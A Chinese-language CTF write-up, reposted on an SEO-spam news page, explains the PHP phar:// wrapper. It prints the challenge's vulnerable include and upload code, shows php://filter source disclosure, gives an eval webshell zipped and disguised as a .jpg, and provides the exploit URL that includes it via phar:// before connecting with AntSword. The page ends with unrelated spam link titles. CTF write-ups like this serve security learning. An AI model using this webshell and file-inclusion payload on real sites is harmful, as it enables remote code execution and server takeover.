当前位置: 首页 > news >正文

www开头网站怎么做如何进行网站性能优化

www开头网站怎么做,如何进行网站性能优化,三里屯网站建设,四川学校网站建设一.phar协议 用于将多个 PHP 文件、类、库、资源(如图像、样式表)等打包成一个单独的文件。这个归档文件可以像其他 PHP 文件一样被包含(include)或执行。PHAR 归档提供了一种方便的方式来分发和安装 PHP 应用程序和库&#xff0c…

一.phar协议

用于将多个 PHP 文件、类、库、资源(如图像、样式表)等打包成一个单独的文件。这个归档文件可以像其他 PHP 文件一样被包含(include)或执行。PHAR 归档提供了一种方便的方式来分发和安装 PHP 应用程序和库,尤其是当它们包含许多文件和目录时

1.格式

将一句话木马(shell.php)压缩成压缩包形式(shell.zip),将压缩包后缀改为.jpg(shell.jpg)

phar://shell.jpg/shell.php

2.实操

点击题目链接,空白页面,查看源代码,发现include.php
在这里插入图片描述
include.php的源代码,有一个upload.php,且告诉参数是file
在这里插入图片描述
访问upload,是文件上传页面,上传木马文件发现不行
在这里插入图片描述
通过php://fifter,查看upload.php和include.php的源代码,(php伪协议)

?file=php://filter/read=convert.base64-encode/resource=include.php发现报错,分析报错原因,知道它强制加后缀.php,这样图片马就上传不了

在这里插入图片描述

?file=php://filter/read=convert.base64-encode/resource=include

在这里插入图片描述
base64解码在这里插入图片描述代码分析,过滤了http|data|ftp|input|%00等字样,还强制在后缀加.php

<html>
Tips: the parameter is file! :) 
<!-- upload.php -->
</html>
<?php@$file = $_GET["file"];if(isset($file)){if (preg_match('/http|data|ftp|input|%00/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=70){echo "<p> error! </p>";}else{include($file.'.php');}}
?>

同样方法得到upload.php

代码分析,只是一个白名单过滤,对文件的后缀和文件类型进行判断

<form action="" enctype="multipart/form-data" method="post" 
name="upload">file:<input type="file" name="file" /><br> 
<input type="submit" value="upload" /></form><?php
if(!empty($_FILES["file"]))
{echo $_FILES["file"];$allowedExts = array("gif", "jpeg", "jpg", "png");@$temp = explode(".", $_FILES["file"]["name"]);$extension = end($temp);if (((@$_FILES["file"]["type"] == "image/gif") || (@$_FILES["file"]["type"] == "image/jpeg")|| (@$_FILES["file"]["type"] == "image/jpg") || (@$_FILES["file"]["type"] == "image/pjpeg")|| (@$_FILES["file"]["type"] == "image/x-png") || (@$_FILES["file"]["type"] == "image/png"))&& (@$_FILES["file"]["size"] < 102400) && in_array($extension, $allowedExts)){move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]);echo "file upload successful!Save in:  " . "upload/" . $_FILES["file"]["name"];}else{echo "upload failed!";}
}
?>
上传shell.jpg,这个文件是shell.php压缩后,将.zip后缀改为.jpg后缀shell.php内容:<?php @eval($_POST[c]);?>
payload:
http://hazelshishuaige.club:8040/include.php?file=phar://upload/shell.jpg/shell

在这里插入图片描述
蚁剑连接
在这里插入图片描述flag在根目录下
在这里插入图片描述

http://www.zhongyajixie.com/news/37296.html

相关文章:

  • 杭州网站建设有限公司百度首页排名优化服务
  • 锦州北京网站建设百度收录关键词
  • 北京疫情最新消息2023年青岛seo排名收费
  • 网站运营怎么做网络推广
  • 济南网站建设泰观网络怎么样把广告做在百度上
  • 直播教育网站建设网页搜索优化seo
  • 全站仪快速建站如何自己弄个免费网站
  • 石家庄哪里有网站推广成都网站建设企业
  • 部门门户网站建设的目的2024很有可能再次封城吗
  • 中小企业网站制作武汉武汉最新
  • 网页设计怎么做版式谷歌seo快速排名优化方法
  • 北京商城网站设计报价网络培训心得体会总结
  • 人妖和美女做视频网站百度推广的几种方式
  • 图表统计类手机网站开发站长工具查询官网
  • 版面设计经历了哪几个阶段优化设计一年级下册数学答案
  • 网页特效设计河北seo基础入门教程
  • 好上手的做海报网站西安分类信息seo公司
  • 网页美工设计招聘网沈阳seo搜索引擎
  • 微信公众号如何做网站如何制作视频网站
  • 网站和新媒体建设方案百度广告位价格表
  • 游戏网站如何做搜索引擎优化指的是什么
  • 快速的可视化平台公司关键词seo
  • 做维修广告效最好是哪个网站吗2022最新小学生新闻
  • 做网站需要用什么软件做推广的公司
  • 防水网站建设万能bt搜索引擎网站
  • 承包酒席可以做网站吗郑州网站网页设计
  • wordpress登陆地址csdnseo网站设计
  • 做淘宝的网站的多少钱怎么开网店
  • 网站网页区别是什么意思网络项目资源网
  • int域名网站有哪些福州百度推广优化排名